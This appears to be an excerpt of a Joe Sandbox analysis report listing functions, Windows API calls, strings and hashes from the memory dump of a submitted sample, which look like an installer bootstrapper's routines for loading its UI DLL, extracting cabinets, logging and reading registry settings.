Opcode Fuzzy Hash: 6de02e575873403505e75a57c772ecdc72f25b45a1b488dbb0269db8d1920d5d
Instruction Fuzzy Hash: 7641B271A00656BFFB159BA4CC99EFABBACFF44315F100526F904E7190DB30AD859BA0

Function 0051D6C9 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 65libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000008,00000000,?,005147FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,0051548E,?), ref: 0051D6DA
GetLastError.KERNEL32(?,005147FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,0051548E,?,?), ref: 0051D6E7
GetProcAddress.KERNEL32(00000000,BootstrapperApplicationCreate), ref: 0051D71F
GetLastError.KERNEL32(?,005147FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,0051548E,?,?), ref: 0051D72B

Strings

BootstrapperApplicationCreate, xrefs: 0051D719
Failed to create UX., xrefs: 0051D76F
Failed to get BootstrapperApplicationCreate entry-point, xrefs: 0051D756
Failed to load UX DLL., xrefs: 0051D712
userexperience.cpp, xrefs: 0051D708, 0051D74C

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID: BootstrapperApplicationCreate$Failed to create UX.$Failed to get BootstrapperApplicationCreate entry-point$Failed to load UX DLL.$userexperience.cpp
API String ID: 1866314245-2276003667
Opcode ID: 082a6f7fb52856918e3ff3da1d2a2be5e698d26fa2b2edde8fa1838a3762084a
Instruction ID: d3e56a6a53e8140e65ed0b2fbbed0cd6b4a69906421d04a775d2163b35b49ade
Opcode Fuzzy Hash: 082a6f7fb52856918e3ff3da1d2a2be5e698d26fa2b2edde8fa1838a3762084a
Instruction Fuzzy Hash: 5311C437A81732A7EB2156949C2DB9B6FA4BF05B62F010526FE50EB2D0DB20DC4497E0

Function 0051F812 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 117registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(?,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 0051F942
RegCloseKey.ADVAPI32(00000000,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 0051F94F

Strings

Failed to read Resume value., xrefs: 0051F8D8
Failed to open registration key., xrefs: 0051F8AB
Failed to format pending restart registry key to read., xrefs: 0051F846
%ls.RebootRequired, xrefs: 0051F82F
Resume, xrefs: 0051F8B6

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: Close
String ID: %ls.RebootRequired$Failed to format pending restart registry key to read.$Failed to open registration key.$Failed to read Resume value.$Resume
API String ID: 3535843008-3890505273
Opcode ID: 70f129ebc731cab514c40fc201e2da65d37c143f1cc56168cab6b4844a1ebe15
Instruction ID: c6100cd998cbf7168789d17c8e0b1279cd64db3ecf1926276812ce4a03e9b768
Opcode Fuzzy Hash: 70f129ebc731cab514c40fc201e2da65d37c143f1cc56168cab6b4844a1ebe15
Instruction Fuzzy Hash: F2414B75900259FFEB11AFA8C985BEDBFB4FB04710F554176E910AB260C371AE81DB90

Function 00550523 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117fileCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(0057B5FC,00000000,?,?,?,00524207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,005154FA,?), ref: 00550533
CreateFileW.KERNEL32(40000000,00000001,00000000,00000000,00000080,00000000,?,00000000,?,?,?,0057B5F4,?,00524207,00000000,Setup), ref: 005505D7
GetLastError.KERNEL32(?,00524207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,005154FA,?,?,?), ref: 005505E7
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00524207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,005154FA,?), ref: 00550621

Part of subcall function 00512DBF: GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 00512F09

LeaveCriticalSection.KERNEL32(0057B5FC,?,?,0057B5F4,?,00524207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,005154FA,?), ref: 0055067A

Strings

logutil.cpp, xrefs: 00550606

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: CriticalFileSection$CreateEnterErrorLastLeaveLocalPointerTime
String ID: logutil.cpp
API String ID: 4111229724-3545173039
Opcode ID: 3aa30fd7c4bf10ab31bc1e5318dd0918a95d75687c848c7dc3efc516ec5ff051
Instruction ID: b55f4c69062ea24eb15ae6533c949f53a5fd7f6575d1fffe02ced1cb9f1a85bc
Opcode Fuzzy Hash: 3aa30fd7c4bf10ab31bc1e5318dd0918a95d75687c848c7dc3efc516ec5ff051
Instruction Fuzzy Hash: 6231A57190022AFFEB115F60AD6AF6A7E68FB40752F015126FD04A61A0E771CD68BB90

Function 005532F3 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 84memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00553309
SysAllocString.OLEAUT32(?), ref: 00553325
VariantClear.OLEAUT32(?), ref: 005533AC
SysFreeString.OLEAUT32(00000000), ref: 005533B7

Strings

`Dv, xrefs: 005533B7
xmlutil.cpp, xrefs: 0055333C

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: StringVariant$AllocClearFreeInit
String ID: `Dv$xmlutil.cpp
API String ID: 760788290-2876128059
Opcode ID: ca7c91f694aa5b01cd4e1de332c399ae1e88066eb98adae0abcb89bbe4c7e45b
Instruction ID: 61a0ffb1a8e534598a0286b763f3fac217c4b37e466d94413d6e17afaa1c55c9
Opcode Fuzzy Hash: ca7c91f694aa5b01cd4e1de332c399ae1e88066eb98adae0abcb89bbe4c7e45b
Instruction Fuzzy Hash: F7218531901219AFCB11DF54C85CEAEBFB9BF44752F160959FD09AB110DB319E08D790

Function 00530B8E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 74fileCOMMON

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 00530BDE
WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00530BFD
GetLastError.KERNEL32 ref: 00530C07

Strings

cabextract.cpp, xrefs: 00530C2B
Failed to write during cabinet extraction., xrefs: 00530C35
Unexpected call to CabWrite()., xrefs: 00530BC1

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: ErrorFileLastWrite_memcpy_s
String ID: Failed to write during cabinet extraction.$Unexpected call to CabWrite().$cabextract.cpp
API String ID: 1970631241-3111339858
Opcode ID: b342a1ac3949ef4c3dc4ff2ef90eaacfad9c7f429dfaa8e051e21caaffa0db6e
Instruction ID: 762b99ddeb7147688d205d52887833e238992b0cb7fbfe35f33616fb64af775e
Opcode Fuzzy Hash: b342a1ac3949ef4c3dc4ff2ef90eaacfad9c7f429dfaa8e051e21caaffa0db6e
Instruction Fuzzy Hash: 66210176500209ABCB14CF5CD9A8D9ABFB8FF84320F211259FE04C7281E631DD00DB60

Function 00550879 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

OpenProcessToken.ADVAPI32(?,00000008,?,005153BD,00000000,?,?,?,?,?,?,?,0052769D,00000000), ref: 00550897
GetLastError.KERNEL32(?,?,?,?,?,?,?,0052769D,00000000), ref: 005508A1
GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,?,?,?,0052769D,00000000), ref: 005508D3
GetLastError.KERNEL32(?,?,?,?,?,?,?,0052769D,00000000), ref: 005508EC
CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,0052769D,00000000), ref: 0055092B

Strings

procutil.cpp, xrefs: 00550919

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: ErrorLastToken$CloseHandleInformationOpenProcess
String ID: procutil.cpp
API String ID: 4040495316-1178289305
Opcode ID: c7b0a9894b376858c57b92fcd91a0522a6c829cc35a3133312d423b1d96897c5
Instruction ID: 0c13dccadb56660f73a9e1344eda76dd5cf5fd6d5c2434e6153418242b5b710c
Opcode Fuzzy Hash: c7b0a9894b376858c57b92fcd91a0522a6c829cc35a3133312d423b1d96897c5
Instruction Fuzzy Hash: C521CC32D41229EBE7219B958819A9EBFB8FF10712F114157ED14E72D0D3708E08E6D0

Function 00530C57 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70timeCOMMON

Download Yara Rule

APIs

DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00530CC4
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00530CD6
SetFileTime.KERNELBASE(?,?,?,?), ref: 00530CE9
CloseHandle.KERNELBASE(000000FF,?,?,?,?,?,?,?,?,?,?,?,?,005308B1,?,?), ref: 00530CF8

Strings

cabextract.cpp, xrefs: 00530C93
Invalid operation for this state., xrefs: 00530C9D

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: Time$File$CloseDateHandleLocal
String ID: Invalid operation for this state.$cabextract.cpp
API String ID: 609741386-1751360545
Opcode ID: d82211d6a0ceffeb1a2d9ee05d61cc697ba08edec755acf25646a7d208b5eea5
Instruction ID: 40d80632b5cd56430b857145276bc6081eae2eec3410b2076e97eb4dae30b1a9
Opcode Fuzzy Hash: d82211d6a0ceffeb1a2d9ee05d61cc697ba08edec755acf25646a7d208b5eea5
Instruction Fuzzy Hash: 3521C07280131AAB9B109FA8CD199FABFACFF04721B505216F854EB5D0D771EE51CB90

Function 00553565 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00553574
InterlockedIncrement.KERNEL32(0057B6C8), ref: 00553591
CLSIDFromProgID.COMBASE(Msxml2.DOMDocument,0057B6B8,?,?,?,?,?,?), ref: 005535AC
CLSIDFromProgID.OLE32(MSXML.DOMDocument,0057B6B8,?,?,?,?,?,?), ref: 005535B8

Strings

Msxml2.DOMDocument, xrefs: 005535A7
MSXML.DOMDocument, xrefs: 005535B3

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: FromProg$IncrementInitializeInterlocked
String ID: MSXML.DOMDocument$Msxml2.DOMDocument
API String ID: 2109125048-2356320334
Opcode ID: a0907b2db91e6a8c01d6efdf3f9e70ce35390aabc25eb069efb1191328c57adf
Instruction ID: 2b89a53fecb22b459cfaf9a96414af0121660ffdacc49f23117c7f742fb3f5e3
Opcode Fuzzy Hash: a0907b2db91e6a8c01d6efdf3f9e70ce35390aabc25eb069efb1191328c57adf
Instruction Fuzzy Hash: 81F0A0307412355BE7201B627D2DB072E65FB91BD7F10142AED0CD2060E360C94DAAB0

Function 00554A6C Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 99memoryCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 00554A9D
GlobalAlloc.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 00554ACA
GetLastError.KERNEL32(?,00000000,?,00000000), ref: 00554AF6
GetLastError.KERNEL32(00000000,0055B7A0,?,00000000,?,00000000,?,00000000), ref: 00554B34
GlobalFree.KERNEL32(00000000), ref: 00554B65

Strings

fileutil.cpp, xrefs: 00554AB8, 00554B11

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: ErrorLast$Global$AllocFree
String ID: fileutil.cpp
API String ID: 1145190524-2967768451
Opcode ID: 13184e9be26ef925efb4509ad0fdee68b567ecfd00bdeb678fcb3d819995ed75
Instruction ID: c4e2d89b74bafe6503e7c509cef467d26036a8e664bb7a33ac4a5de4d50ebb53
Opcode Fuzzy Hash: 13184e9be26ef925efb4509ad0fdee68b567ecfd00bdeb678fcb3d819995ed75
Instruction Fuzzy Hash: 9031F636D40229ABDB129A95CC25FAFBEB9BF84766F114117FD04E7240E730DC449AE0

Function 0052E956 Relevance: 9.1, APIs: 6, Instructions: 85windowCOMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000082,?,?), ref: 0052E985
SetWindowLongW.USER32(?,000000EB,00000000), ref: 0052E994
SetWindowLongW.USER32(?,000000EB,?), ref: 0052E9A8
DefWindowProcW.USER32(?,?,?,?), ref: 0052E9B8
GetWindowLongW.USER32(?,000000EB), ref: 0052E9D2
PostQuitMessage.USER32(00000000), ref: 0052EA31

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: Window$Long$Proc$MessagePostQuit
String ID:
API String ID: 3812958022-0
Opcode ID: 0ed603b514773685d88377120bd912185b58bf66e81060a48c1e90a79e2edf4b
Instruction ID: 312516c831d8180cee037bd556d3761b544c4b57b8efd0a9a4a18b166833a781
Opcode Fuzzy Hash: 0ed603b514773685d88377120bd912185b58bf66e81060a48c1e90a79e2edf4b
Instruction Fuzzy Hash: 3821E231100224BFDB015F68EC0EE6A3F66FF56311F114A18F906AA1E0C331DD50DB60

Function 00530A81 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 101COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 00530B27
GetLastError.KERNEL32(?,?,?), ref: 00530B31

Strings

Invalid seek type., xrefs: 00530ABD
cabextract.cpp, xrefs: 00530B55
Failed to move file pointer 0x%x bytes., xrefs: 00530B62

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID: Failed to move file pointer 0x%x bytes.$Invalid seek type.$cabextract.cpp
API String ID: 2976181284-417918914
Opcode ID: c17d3e6a874df92f32ea5caed0110fe134239636bf8ef6ae089147320d32d721
Instruction ID: bb8842be85c327d46389f71596cb337c563e047b53db18704d40951ee347a118
Opcode Fuzzy Hash: c17d3e6a874df92f32ea5caed0110fe134239636bf8ef6ae089147320d32d721
Instruction Fuzzy Hash: 9D31A035A4031AEFCB11CFA8D8A4DAEBB69FF04724F148515FD14A7290D730ED108B90

Function 00514115 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,840F01E8,00000000,00000000,?,0052A0E8,00000000,00000000,?,00000000,005153BD,00000000,?,?,0051D5B5,?), ref: 00514123
GetLastError.KERNEL32(?,0052A0E8,00000000,00000000,?,00000000,005153BD,00000000,?,?,0051D5B5,?,00000000,00000000), ref: 00514131
CreateDirectoryW.KERNEL32(?,840F01E8,00515489,?,0052A0E8,00000000,00000000,?,00000000,005153BD,00000000,?,?,0051D5B5,?,00000000), ref: 0051419A
GetLastError.KERNEL32(?,0052A0E8,00000000,00000000,?,00000000,005153BD,00000000,?,?,0051D5B5,?,00000000,00000000), ref: 005141A4

Strings

dirutil.cpp, xrefs: 005141D4

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: dirutil.cpp
API String ID: 1375471231-2193988115
Opcode ID: 71714e24ef0a950cd5351b2c84d79a063ff44f13b6bfdfb6578fdeb2b7bb0b5d
Instruction ID: 427bf1071725cc37b5fd9d93856fffaa4693bc6e578fd30b3a33823f663d457f
Opcode Fuzzy Hash: 71714e24ef0a950cd5351b2c84d79a063ff44f13b6bfdfb6578fdeb2b7bb0b5d
Instruction Fuzzy Hash: 4B11053A680735B6FB311AA14C58BBBAE54FF71B71F115421FD04EA150E3608DC0DA90

Function 00550764 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 63filestringCOMMONLIBRARYCODE

Download Yara Rule

APIs

lstrlenA.KERNEL32(;R,00000000,00000000,?,?,?,00550013,0052E93B,0052E93B,?,00000000,0000FDE9,?,0052E93B,8000FFFF,Unexpected return value from message pump.), ref: 00550776
WriteFile.KERNELBASE(000002BC,00000000,00000000,?,00000000,?,?,00550013,0052E93B,0052E93B,?,00000000,0000FDE9,?,0052E93B,8000FFFF), ref: 005507B2
GetLastError.KERNEL32(?,?,00550013,0052E93B,0052E93B,?,00000000,0000FDE9,?,0052E93B,8000FFFF,Unexpected return value from message pump.), ref: 005507BC

Strings

;R, xrefs: 00550769, 005507D8, 00550775, 0055078B, 005507AC, 005507B0
logutil.cpp, xrefs: 005507ED

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: ErrorFileLastWritelstrlen
String ID: ;R$logutil.cpp
API String ID: 606256338-757063661
Opcode ID: 1a7a3a20daf0b7f4efeddb0a34d0c348a125d0eba11009c3979b5a3b4b594007
Instruction ID: 3b663219cabec23f27b1e5a65b4ef06e0354046130eb0d1e70101fcb34635ff1
Opcode Fuzzy Hash: 1a7a3a20daf0b7f4efeddb0a34d0c348a125d0eba11009c3979b5a3b4b594007
Instruction Fuzzy Hash: 4E11CA72911225AB93209A659D68AAFBE6CFB98762F114255FD04E7180E730AD04EAE0

Function 00523AA6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00550F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0057AAA0,00000000,?,005557E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00550F80

RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,00523FB5,feclient.dll,?,00000000,?,?,?,00514B12), ref: 00523B42

Part of subcall function 005510B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 0055112B
Part of subcall function 005510B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00551163

Strings

feclient.dll, xrefs: 00523AAB
Logging, xrefs: 00523AD4
SOFTWARE\Policies\Microsoft\Windows\Installer, xrefs: 00523AB7

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: Logging$SOFTWARE\Policies\Microsoft\Windows\Installer$feclient.dll
API String ID: 1586453840-3596319545
Opcode ID: d8f6ba017040105a1a704ca7aad8d6f07133cc1cacbf954db1253b1caa49e364
Instruction ID: 9adc140708f332b990031f6bd724a7731154f859f32ab31e64e898cfad284a5a
Opcode Fuzzy Hash: d8f6ba017040105a1a704ca7aad8d6f07133cc1cacbf954db1253b1caa49e364
Instruction Fuzzy Hash: 1E119336B40218BBDB21DE95EC86EAABFB8FF56B01F400066E5009B0D1D6759F81E710

Function 005309EA Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0053140C: SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,00530A19,?,?,?), ref: 00531434
Part of subcall function 0053140C: GetLastError.KERNEL32(?,00530A19,?,?,?), ref: 0053143E

ReadFile.KERNELBASE(?,?,?,?,00000000,?,?,?), ref: 00530A27
GetLastError.KERNEL32 ref: 00530A31

Strings

cabextract.cpp, xrefs: 00530A55
Failed to read during cabinet extraction., xrefs: 00530A5F

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: ErrorFileLast$PointerRead
String ID: Failed to read during cabinet extraction.$cabextract.cpp
API String ID: 2170121939-2426083571
Opcode ID: 67f637062826178e1aadb962ebcb278c5af66b59c4024943a9940b8e3a4dab1f
Instruction ID: 58f4c6604859b4f44b6aa68b3d735a13100904417d6f198225bd58439b70c13f
Opcode Fuzzy Hash: 67f637062826178e1aadb962ebcb278c5af66b59c4024943a9940b8e3a4dab1f
Instruction Fuzzy Hash: B011E136A0032ABBDB219F95EC18E9E7F68FF44B60F114115FD04A7290C7309910DBE0

Function 0053140C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,00530A19,?,?,?), ref: 00531434
GetLastError.KERNEL32(?,00530A19,?,?,?), ref: 0053143E

Strings

cabextract.cpp, xrefs: 00531462
Failed to move to virtual file pointer., xrefs: 0053146C

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID: Failed to move to virtual file pointer.$cabextract.cpp
API String ID: 2976181284-3005670968
Opcode ID: c66a2e5fe7fcf763f5e6b51422d9c6cea1341d9d41a139f28ffbb059d3b296ca
